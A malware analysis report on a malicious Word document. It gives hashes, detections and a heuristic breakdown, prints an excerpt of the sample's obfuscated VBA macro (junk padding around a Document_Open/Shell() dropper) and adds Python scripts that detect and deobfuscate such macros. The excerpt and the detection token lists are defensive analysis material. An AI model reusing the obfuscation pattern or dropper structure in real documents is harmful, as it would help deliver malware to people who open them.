Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a1094ef31630fce1…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 284.0 KB
Created: 2017-10-10 19:25:00
Authoring application: Microsoft Office Word
First seen: 2017-10-28
MD5: c06ec21287c45c940b470cf2f51f61c0
SHA-1: aa0b134c5ae98ce5b5e70629bfcc189e9a312e26
SHA-256: a1094ef31630fce1db8d3eb8c0505256f2e0a3a6371971d38a9b38039822c65e
Risk Score: 222

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample contains VBA macros, including a Document_Open handler that calls Shell(), so code runs as soon as the document is opened with macros enabled. The visible portion of the extracted module is junk-code padding (throwaway string literals, Mid() calls whose constant arithmetic resolves to out-of-range positions, and If Len(...) guards that can never be true), which is typical of builder-obfuscated downloader stages; the Shell() call itself sits in the part of the module not shown in the preview. The ClamAV detection Doc.Dropper.Agent-6344763-0 is consistent with a dropper or downloader. Note that no payload URL was extracted from the sample: the only URL found is an OOXML schema namespace, so the second-stage address is either built at runtime inside the macro or fetched by the spawned process.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6344763-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6344763-0
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    The macro source contains a call to Shell(), which launches an external process
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    The module defines Document_Open, an auto-execution entry point that runs when the document is opened with macros enabled
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace that Office writes into every document with drawing content; it is not an address the macro contacts and should not be treated as an indicator.
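The co-occurrence rule behind OLE_VBA_PCODE_AUTOEXEC_EXEC and the Document_Open/Shell() findings can be reproduced over decoded source. The following Python is an added example written for this page, not the scanner's own signature set: the entry-point and execution-token lists are the editor's assumptions, and both VBA modules it scans are constructed to mimic the padding style of the extracted macro above. An auto-run entry point alone is a medium finding, an execution primitive alone is noise, and only the pair raises the verdict.

```python
"""Triage a decoded VBA module: flag auto-execution entry points that
co-occur with process-execution / download primitives.  Added example,
not the report's scanner.  Token lists below are assumptions."""
import re

# Procedures Office runs without a click (assumed list, not exhaustive).
AUTOEXEC = re.compile(
    r"\b(?:Document_Open|Document_Close|Document_New|AutoOpen|AutoClose|AutoExec|"
    r"AutoNew|Workbook_Open|Workbook_Activate|Auto_Open|Auto_Close)\b", re.I)

# Execution / download / object-creation tokens (assumed list).
EXEC_TOKENS = {
    # Shell as statement or function; the lookbehind excludes "WScript.Shell".
    "shell": re.compile(r'(?<![.\w])Shell\s*(?:\(|"|\w)', re.I),
    "createobject": re.compile(r"\bCreateObject\s*\(", re.I),
    "wscript_shell": re.compile(r"\bWScript\.Shell\b", re.I),
    "download": re.compile(r"\b(?:URLDownloadToFile|XMLHTTP|WinHttpRequest|ServerXMLHTTP)\b", re.I),
    "powershell": re.compile(r"\bpowershell\b", re.I),
    "win32_api": re.compile(r"\bDeclare\s+(?:PtrSafe\s+)?(?:Function|Sub)\b", re.I),
}


def strip_comments(src: str) -> str:
    """Drop ' comments, string-aware, so a commented-out Shell( does not count."""
    out = []
    for line in src.splitlines():
        in_str, cut = False, len(line)
        for i, ch in enumerate(line):
            if ch == '"':
                in_str = not in_str          # doubled "" toggles twice, which is correct
            elif ch == "'" and not in_str:
                cut = i
                break
        out.append(line[:cut])
    return "\n".join(out)


def triage(vba_src: str) -> dict:
    """Return entry points, execution-token counts, and the pair-based verdict."""
    code = strip_comments(vba_src)
    entry = sorted({m.group(0) for m in AUTOEXEC.finditer(code)}, key=str.lower)
    tokens = {n: len(rx.findall(code)) for n, rx in EXEC_TOKENS.items()}
    tokens = {n: c for n, c in tokens.items() if c}
    return {"autoexec": entry, "exec_tokens": tokens,
            "suspicious": bool(entry and tokens)}


# Constructed sample modelled on the padding style of the extracted macro.
SAMPLE = '''Attribute VB_Name = "ThisDocument"
Sub Document_Open()
L64JVi83 = "V6upEIBH"
L64JVi83 = LTrim(Mid(L64JVi83, -1643 + 1654, -1643 + 1654))
' Shell("calc") in a comment must not be counted
JCVAJY6 = "poGiJOL"
If Len(JCVAJY6) > 156 Then
MsgBox "jKg4A", 63, "RhfdS"
End If
Set o = CreateObject("WScript.Shell")
cmd = "cmd.exe /c echo constructed-sample"
Shell cmd, 0
End Sub
'''

# Constructed benign macro: auto-exec entry point, but no execution primitive.
BENIGN = '''Sub Document_Open()
MsgBox "Reminder: please review the attached policy", vbInformation, "Notice"
End Sub
'''

if __name__ == "__main__":
    print(triage(SAMPLE))
    print(triage(BENIGN))
```

Run it on the output of olevba (or any decoded module) instead of the constructed strings; when source extraction fails, the same token sets applied to strings pulled from the p-code stream are what the heuristic above describes.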

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 82922 bytes
SHA-256: 6c03227413725a4333f3292ac08e4cc8ddbef27624e27300abe82bdfa2e9596d

Script preview (first 1,000 lines of the extracted module)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
L64JVi83 = "V6upEIBH"
L64JVi83 = LTrim(Mid(L64JVi83, -1643 + 1654, -1643 + 1654))
JCVAJY6 = "poGiJOL"
If Len(JCVAJY6) > 156 Then
sBpku = "jKg4A"
MsgBox sBpku, 63, "RhfdS"
End If
Tf2sFa = "oI1RV"
If Len(Tf2sFa) > 156 Then
YaxTIDuhl = "pOUc9KF6"
MsgBox YaxTIDuhl, 63, "vLj4B8ncS"
End If
Vpr83DbwT = "jQ6xpZhuk"
Vpr83DbwT = Trim(Mid(Vpr83DbwT, -1632 + 1642, -1632 + 1642))
MnSQNCVu = "WTgQwOuB"
If Len(MnSQNCVu) > 173 Then
B8zWQovN = "AxIwLKA"
MsgBox B8zWQovN, 58, "foCES"
End If
Rktq5O76 = "YV5ty"
Rktq5O76 = LTrim(Mid(Rktq5O76, -1632 + 1642, -1632 + 1642))
lNYMIF = "51GJo"
ad5b0gu4V = "UGbpZ"
AeYlxs3P = "gQsDb"
AeYlxs3P = Trim(Mid(AeYlxs3P, -2717 + 2727, -2717 + 2727))
D3JbZ = "IpwsUM"
D3JbZ = RTrim(Mid(D3JbZ, -2717 + 2727, -2717 + 2727))
RER5ueVlv = "eXqh3M9d1"
RER5ueVlv = Trim(Mid(RER5ueVlv, -2309 + 2314, -2309 + 2314))
xEC2uS1I = "Qoh8pfId"
xEC2uS1I = Trim(Mid(xEC2uS1I, -2309 + 2314, -2309 + 2314))
ZQJzKTt = "walb0"
ZQJzKTt = RTrim(Mid(ZQJzKTt, -2309 + 2314, -2309 + 2314))
Dim IlyCB53D
IlyCB53D = lNYMIF & ad5b0gu4V
LMjk1emG = "hp2Ls5m"
I30q9nyT = "Lhh"
qMtb9ay = "Pl3rsYVP"
qMtb9ay = Trim(Mid(qMtb9ay, -1635 + 1641, -1635 + 1641))
Slt913j = "QcuqCw1Z"
If Len(Slt913j) > 233 Then
dW2lLg = "Irbsayk"
MsgBox dW2lLg, 62, "R2mYUKkE"
End If
NhJGz = "nkyeZfI"
NhJGz = Trim(Mid(NhJGz, -1635 + 1641, -1635 + 1641))
YAC8N4q6T = "p3SIN"
YAC8N4q6T = RTrim(Mid(YAC8N4q6T, 26493 - 26492, 26493 - 26492))
ivmElgqnR = "u2N3PKs7C"
ivmElgqnR = LTrim(Mid(ivmElgqnR, 26493 - 26492, 26493 - 26492))
sLjoD = "dq9wR2"
If Len(sLjoD) > 175 Then
ahRHlB = "nAtCZl4"
MsgBox ahRHlB, 62, "r9DYZ"
End If
I2LpPClf = "QoWqY"
I2LpPClf = RTrim(Mid(I2LpPClf, 13656 / 13656, 13656 / 13656))
Dim yeE0j9ug
yeE0j9ug = LMjk1emG & I30q9nyT
ylteANh = "WYlJ3bmtz"
fOL8mS6kp = "J"
ZtfqP = "aowxIJ"
If Len(ZtfqP) > 254 Then
GthXxTJ6 = "X7pHLZBvt"
MsgBox GthXxTJ6, 27, "oMITo8"
End If
b7XVPJ5Hp = "v5OPxyd"
If Len(b7XVPJ5Hp) > 254 Then
pfgauje = "EvlnmoHzK"
MsgBox pfgauje, 27, "SjuwbdI"
End If
eogyB = "w9trPNVM"
eogyB = LTrim(Mid(eogyB, -5058 + 5061, -5058 + 5061))
WHsW7m = "IGOsM"
WHsW7m = LTrim(Mid(WHsW7m, -5058 + 5061, -5058 + 5061))
C0WU1OCaT = "IGw5Be"
If Len(C0WU1OCaT) > 176 Then
KL0BM = "zeHE7Q"
MsgBox KL0BM, 24, "Y4Mhkmq"
End If
CcNowsvL = "R09P2k"
CcNowsvL = Trim(Mid(CcNowsvL, -5058 + 5061, -5058 + 5061))
Dim V64u1
V64u1 = ylteANh & fOL8mS6kp
qNlYWB = "yVXetRCKo"
i81Di3Qm = Chr(78)
RIWi4NKR = "MVx7KjZh0"
If Len(RIWi4NKR) > 161 Then
E5oLT79mn = "OdIjXqx"
MsgBox E5oLT79mn, 53, "CeT3Qvy"
End If
glb7RzX = "LANut"
glb7RzX = Trim(Mid(glb7RzX, 2693 - 2681, 2693 - 2681))
PWLKXzeh8 = "czqV0"
If Len(PWLKXzeh8) > 230 Then
mcue3M17 = "jDke5gi"
MsgBox mcue3M17, 3, "L2MFKa5E"
End If
ENgym = "aDH4e"
ENgym = LTrim(Mid(ENgym, 1547 - 1531, 1547 - 1531))
yJYkbjRS = "NvuL5HsZ"
yJYkbjRS = RTrim(Mid(yJYkbjRS, 1547 - 1531, 1547 - 1531))
Dim TPtm3fla
TPtm3fla = qNlYWB & i81Di3Qm
y13H7ys = "E5"
mnPNIXU = "CduVWas"
xN5Vu = "N"
eO0lu = "El0kv"
If Len(eO0lu) > 151 Then
Wd98Agi0G = "f4iYPD1"
MsgBox Wd98Agi0G, 13, "DYs79dfCE"
End If
wDL2KXTI = "OQxjNof"
wDL2KXTI = Trim(Mid(wDL2KXTI, 26377 / 2029, 26377 / 2029))
zSAMVQlB = "fgSfZ0W1a"
If Len(zSAMVQlB) > 212 Then
BsIUZlJ = "xbs48xzG"
MsgBox BsIUZlJ, 52, "uqzdvaEly"
End If
oHP9NBYa = "n5fidZ3Ol"
If Len(oHP9NBYa) > 212 Then
EBAjVC = "otolGgH4r"
MsgBox EBAjVC, 52, "q9FaUj"
End If
CvWwxQ = "jWDwn7ut0"
CvWwxQ = LTrim(Mid(CvWwxQ, 8996 / 692, 8996 / 692))
WpEJf = "KiPCV4Koz"
WpEJf = RTrim(Mid(WpEJf, 8996 / 692, 8996 / 692))
zz3tDlVh9 = "j2fpjX"
zz3tDlVh9 = RTrim(Mid(zz3tDlVh9, 8996 / 692, 8996 / 692))
TEY6wi = "TJQ6lYVbZ"
TEY6wi = RTrim(Mid(TEY6wi, 24714 / 8238, 24714 / 8238))
x4Vv2 = "NFXW6u"
x4Vv2 = LTrim(Mid(x4Vv2, 24714 / 8238, 247
... (truncated)
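Every visible line of the module above follows three padding idioms: a string literal assigned to a throwaway name, a Mid() call whose start and length are constant arithmetic (-1643 + 1654, 13656 / 13656, 26377 / 2029) that resolves to a position usually past the end of the string, and an If Len(var) > N guard around a MsgBox that can never fire because the literal is far shorter than N. The following Python is an added example, not the report's tooling: it folds the constant arithmetic, evaluates Mid()/Trim()/Chr()/& on known literals with VBA semantics, drops the dead guards, and leaves a listing in which the few assignments that produce a non-empty value stand out. The input is a constructed excerpt reproducing lines from the preview; the remaining 80 KB of the real module is not on this page and is not modelled.

```python
"""Strip the junk-code layer from a decoded VBA macro.  Added example
written for this page; the input below is a constructed excerpt of the
preview, not the complete module."""
import re

ARITH = re.compile(r"(-?\d+)\s*([+\-/*])\s*(-?\d+)")          # e.g. "-1643 + 1654"
ASSIGN_LIT = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$')
ASSIGN_MID = re.compile(r"^\s*(\w+)\s*=\s*(LTrim|RTrim|Trim)\(Mid\((\w+),\s*(-?\d+),\s*(-?\d+)\)\)\s*$")
ASSIGN_CAT = re.compile(r"^\s*(\w+)\s*=\s*(\w+)\s*&\s*(\w+)\s*$")
ASSIGN_CHR = re.compile(r"^\s*(\w+)\s*=\s*Chr\((\d+)\)\s*$")
IF_LEN = re.compile(r"^\s*If\s+Len\((\w+)\)\s*>\s*(\d+)\s+Then\s*$")
TRIM = {"Trim": str.strip, "LTrim": str.lstrip, "RTrim": str.rstrip}  # VBA trims spaces only; close enough here


def fold_constants(line: str) -> str:
    """Replace integer 'a op b' sub-expressions with their value until none remain."""
    def _ev(m):
        a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
        if op == "/":
            if b == 0 or a % b:
                return m.group(0)            # leave non-exact division untouched
            return str(a // b)
        return str({"+": a + b, "-": a - b, "*": a * b}[op])
    prev = None
    while prev != line:
        prev, line = line, ARITH.sub(_ev, line)
    return line


def vba_mid(s: str, start: int, length: int) -> str:
    """VBA Mid(): 1-based start; a start beyond the string returns ''."""
    if start < 1 or length < 0:
        raise ValueError("Invalid procedure call")   # VBA runtime error 5
    return s[start - 1:start - 1 + length]


def deobfuscate(src: str):
    """Return (cleaned lines, final variable values, number of dead lines removed)."""
    env, out, removed = {}, [], 0
    lines = [fold_constants(l) for l in src.splitlines()]
    i = 0
    while i < len(lines):
        line = lines[i]
        m = IF_LEN.match(line)
        if m and m.group(1) in env and len(env[m.group(1)]) <= int(m.group(2)):
            # Guard can never be true: skip through the matching End If.
            j, depth, i = i, 1, i + 1
            while i < len(lines) and depth:
                s = lines[i].strip()
                if s.startswith("If ") and s.endswith(" Then"):
                    depth += 1
                elif s.lower() == "end if":
                    depth -= 1
                i += 1
            removed += i - j
            continue
        if (m := ASSIGN_LIT.match(line)):
            env[m.group(1)] = m.group(2)
            out.append(line)
        elif (m := ASSIGN_CHR.match(line)):
            env[m.group(1)] = chr(int(m.group(2)))
            out.append(f'{m.group(1)} = "{env[m.group(1)]}"')
        elif (m := ASSIGN_MID.match(line)) and m.group(3) in env:
            v = TRIM[m.group(2)](vba_mid(env[m.group(3)], int(m.group(4)), int(m.group(5))))
            env[m.group(1)] = v
            out.append(f'{m.group(1)} = "{v}"')
        elif (m := ASSIGN_CAT.match(line)) and m.group(2) in env and m.group(3) in env:
            v = env[m.group(2)] + env[m.group(3)]
            env[m.group(1)] = v
            out.append(f'{m.group(1)} = "{v}"')
        else:
            out.append(line)                   # anything we cannot evaluate is kept verbatim
        i += 1
    return out, env, removed


# Constructed excerpt reproducing lines from the preview above.
SAMPLE = '''Sub Document_Open()
L64JVi83 = "V6upEIBH"
L64JVi83 = LTrim(Mid(L64JVi83, -1643 + 1654, -1643 + 1654))
JCVAJY6 = "poGiJOL"
If Len(JCVAJY6) > 156 Then
sBpku = "jKg4A"
MsgBox sBpku, 63, "RhfdS"
End If
lNYMIF = "51GJo"
ad5b0gu4V = "UGbpZ"
Dim IlyCB53D
IlyCB53D = lNYMIF & ad5b0gu4V
YAC8N4q6T = "p3SIN"
YAC8N4q6T = RTrim(Mid(YAC8N4q6T, 26493 - 26492, 26493 - 26492))
i81Di3Qm = Chr(78)
wDL2KXTI = "OQxjNof"
wDL2KXTI = Trim(Mid(wDL2KXTI, 26377 / 2029, 26377 / 2029))
End Sub
'''

if __name__ == "__main__":
    cleaned, env, removed = deobfuscate(SAMPLE)
    print("\n".join(cleaned))
    print(f"-- {removed} dead lines removed; non-empty values:",
          {k: v for k, v in env.items() if v})
```

Applied to the full macros.bas, the same pass collapses the padding to a handful of non-empty strings, and whatever is concatenated into the Shell() argument becomes readable without running the document; lines the evaluator does not understand are passed through unchanged rather than guessed at.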